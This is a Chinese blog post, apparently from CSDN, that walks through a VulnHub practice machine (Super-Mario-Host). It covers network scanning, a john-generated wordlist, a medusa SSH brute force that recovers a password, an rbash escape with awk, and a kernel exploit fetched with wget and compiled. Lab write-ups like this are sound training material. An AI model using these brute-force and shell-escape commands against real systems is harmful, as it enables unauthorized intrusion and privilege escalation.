靶机实战(Super-Mario-Host-v1.0.1)

最新推荐文章于 2024-07-16 09:41:55 发布
最新推荐文章于 2024-07-16 09:41:55 发布
阅读量548 收藏 2
点赞数
分类专栏: 靶机实战 文章标签: vulnhub 靶机 靶机练习 网络安全 超级玛丽 Rbash绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/107327694
版权

超级玛丽

实验环境

靶机:超级玛丽(Super-Mario-Host-v1.0.1)
测试机:kali(IP:192.168.186.128),win10

实验过程

信息收集

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

masscan -p 0-65535 --rate=10000 192.168.186.131

在这里插入图片描述

服务发现

nmap 192.168.186.131 -p 22,8180 -sV -O -T4

在这里插入图片描述

目录扫描

主页
在这里插入图片描述
在这里插入图片描述
根据上面的提示去设置hosts文件
在这里插入图片描述
在C:\Windows\System32\drivers\etc下设置hosts文件。
在这里插入图片描述
再去访问:
在这里插入图片描述
在这里插入图片描述

漏洞发现

在页面luigi.php发现关键信息
在这里插入图片描述
对用户名信息用john 生成字典文件u

john --wordlist=p.txt --stdout --rules >  u

在这里插入图片描述
在这里插入图片描述

漏洞利用

medusa爆破出用户名:luigi 密码:luigi1

 medusa -M ssh -h 192.168.186.131 -U u -P u

在这里插入图片描述
ssh登录,这里shell做了限制
在这里插入图片描述

提权

进行rbash绕过,https://www.freebuf.com/articles/system/188989.html

awk 'BEGIN {system("/bin/bash")}'

在这里插入图片描述
查看系统版本信息

lsb_release -a

在这里插入图片描述
searchsploit 搜寻相关提权脚本
在这里插入图片描述

python -m SimpleHTTPServer 8080,开启简易web服务,wget将脚本下载至靶机

在这里插入图片描述
编译运行
在这里插入图片描述

总结

在信息收集过程中,若找到一些关于用户,用户邮箱等的身份信息,可以用john生成对应字典,针对ssh,或网站后台进行爆破。
RBASH绕过

~~...
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透(八)Super-Mario-Host
qq_42180996的博客
05-06 1098
靶机Super-Mario-Host 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(8180端口) 2.目录扫描(dirb) 3.访问/vhosts 4.目录爆破(御剑) ...
靶机实战-Node
滕财然的博客
01-20 1133
靶机实战-Node 文章目录靶机实战-Node1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务5、22端口--ssh服务6、提权 1、主机发现 netdiscover -i eth0 -r 网段 2、端口扫描 目标开放3000,22端口 3、端口详细信息扫描 22端口对应的服务为ssh 3000端口(node.js的默认端口)对应的服务为http 4、访问http服务 在网...
vulnhub Super-Mario-Host-v1.0.1
底层社会中的弱智
03-18 363
局域网搜索目标: 确定目标主机 192.168.2.11 扫描端口--服务--版本 22端口 openssh 6.6.1sp1 目前没找到漏洞 8180端口 http服务 中间件apache 8180端口的检查 一个nginx的显示页面 扫目录: 打开页面 网页给出一个新的服务器名称 尝试打开这个网页 在hosts添加一条地址 打开网址之后,里面...
kali渗透综合靶机(七)--Super-Mario-Host靶机
W小哥
03-14 1338
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、zico2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
渗透测试-vulnhub靶机 super-mario-host
2301_79441074的博客
11-25 56
发现可以执行awk cat cd clear echo exit help history ll lpath ls lsudo vim 命令,所以想到awk提权。靶机服务器名称(mario.supermariohost.local)网站根路径(/var/www/supermariohost)服务器的管理员(webmaster@localhost)进入之后发现大多数命令无法使用,使用help命令查看可以使用哪些命令。john在该user的基础上生成相应社工密码进行爆破。靶机下载kali的提权漏洞。
【Orasi靶机
qq_40646572的博客
09-29 1867
orasi靶机挑战
vulnhub靶机Orasi
m0_73248913的博客
12-04 445
vulnhub靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Super-Mario-Host超级玛丽靶机
m0_52484587的博客
07-16 400
VulnHub super-Mario-Host超级马里奥主机的渗透测试过程_靶机super mario host-CSDN博客
VulnHub super-Mario-Host超级马里奥主机的渗透测试过程
旺仔Sec&blog
02-29 813
fcrackzip 是一个用于暴力破解 ZIP 文件密码的工具。它可以尝试各种密码组合来解密加密的 ZIP 文件。fcrackzip 使用基于字典的攻击和暴力破解方法来破解密码保护的 ZIP 文件。
VulnHub 靶场--super-Mario-Host
Beret-81的博客
03-25 427
Tomcat 服务器的安全设置Tomcat简单介绍Tomcat 启动权限修改管理帐号密码 Tomcat简单介绍 Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开放和调试Jsp 程序的首选。 Tomcat 启动权限 1、tomcat启动用户权限必须为非root权限,尽量减低tomcat启动用户的目录访问权限。 2、如需直接对外使用80端口,...
Super-Mario-Host
weixin_52263461的博客
03-04 219
Super-Mario-Host实验步骤 一 实验环境 攻击机:kali 192.168.62.128 靶机: ubuntu 192.168.62.129 二 实验步骤 nmap - sP 192.168.62.0/24 扫描靶机ip地址 nmap -A 192.168.2.129 扫描靶机详细信息(端口开放,物理地址等)可以看出22端口,8180端口开放 可以尝试进行网站访问 3. ip地址加端口进行访问,以看到主页没有什么有用信息。接下来使用dirb分别对默认字典和大字典对靶机
AuthBWC-0.3.3-py3-none-any.whl.zip
08-07
AuthBWC-0.3.3-py3-none-any.whl.zip
音视频剪辑库moviepy及其应用
最新发布
08-07
一些用moviepy库处理编辑视频的代码。主要包括:视频与视频之间的格式转换、视频提取音频、文本/颜色/遮罩剪辑、混剪、文字/转场切换特效及其与matplotlib、numpy创建动画的一些简单例子。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值